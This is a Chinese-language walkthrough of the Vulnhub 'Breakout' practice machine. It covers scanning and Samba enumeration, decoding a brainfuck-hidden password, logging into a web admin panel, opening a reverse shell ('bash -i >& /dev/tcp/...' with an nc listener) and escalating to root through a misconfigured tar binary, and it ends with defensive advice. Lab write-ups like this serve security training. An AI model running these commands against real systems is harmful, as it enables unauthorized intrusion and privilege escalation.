Breakout靶机渗透复现教学文档

0x00 环境准备

• 攻击机: Kali Linux (IP: 192.168.80.128)
• 靶机: Vulnhub的Breakout靶机(初始IP未知)
• 网络环境: 确保攻击机和靶机在同一局域网内

0x01 信息收集阶段

1. 发现靶机IP

使用arpscan探测局域网内存活主机:

arp-scan -l

2. 端口扫描

使用Nmap扫描发现的靶机IP:

nmap -sV -p- <靶机IP>

发现开放了多个端口，其中10000和20000端口值得关注。

3. 目录扫描

使用工具如dirb或gobuster扫描Web目录:

gobuster dir -u http://<靶机IP> -w /usr/share/wordlists/dirb/common.txt

但未发现有价值的信息。

0x02 初步渗透

1. 分析80端口Web服务

访问http://<靶机IP>，查看页面源码发现:

• 英文提示: 加密信息是访问权限信息
• 加密字符串: 疑似brainfuck编码

使用在线brainfuck解码工具解密，得到疑似密码的字符串:

.2uqPEfj3D<P'a-3

2. 分析10000和20000端口

访问https://<靶机IP>:10000和https://<靶机IP>:20000:

• 均为登录接口
• 尝试使用admin/解密得到的密码登录失败

3. Samba服务枚举

使用enum4linux枚举Samba共享信息:

enum4linux <靶机IP>

发现有效用户账号:

cyber

尝试使用cyber和解密得到的密码登录:

• 10000端口: 失败
• 20000端口: 成功

0x03 获取初始立足点

1. 探索Web管理界面

在20000端口的Web管理界面中:

• 发现可以查看服务器文件内容的工具
• 下载user.txt获取低权限flag
• 发现文件上传功能但无法直接利用

2. 命令执行获取Shell

在"Command Shell"功能处执行反弹Shell命令:

bash -i >& /dev/tcp/<攻击机IP>/4444 0>&1

在攻击机监听:

nc -lvnp 4444

成功获取交互式Shell。

0x04 权限提升

1. 检查sudo权限

sudo -l

未发现可用sudo权限。

2. 查找SUID文件

find / -perm -u=s -type f 2>/dev/null

发现/home/cyber/tar有执行权限。

3. 查找敏感文件

find / -name "*pass*"

发现.old_pass文件但无读取权限。

4. 利用tar提权

使用tar压缩.old_pass并解压以获取读取权限:

./tar cf pass.tar .old_pass
./tar xf pass.tar
cat .old_pass

获取到旧的root密码。

5. 切换root用户

su root

输入获取到的旧密码，成功提权。

6. 获取root flag

cd /root
cat root.txt

完成整个渗透过程。

0x05 总结与防御建议

关键漏洞点:

1. Samba服务泄露用户账号
2. Web管理界面弱密码
3. 命令执行功能未做限制
4. 自定义tar可执行文件权限设置不当

防御建议:

1. 加强密码策略，避免使用弱密码
2. 限制Web管理界面的命令执行功能
3. 定期检查SUID/SGID文件
4. 更新Samba服务配置，防止用户枚举
5. 实施最小权限原则

参考资源

• CSDN博客: Breakout靶机渗透
• Brainfuck在线解码工具
• Vulnhub Breakout靶机下载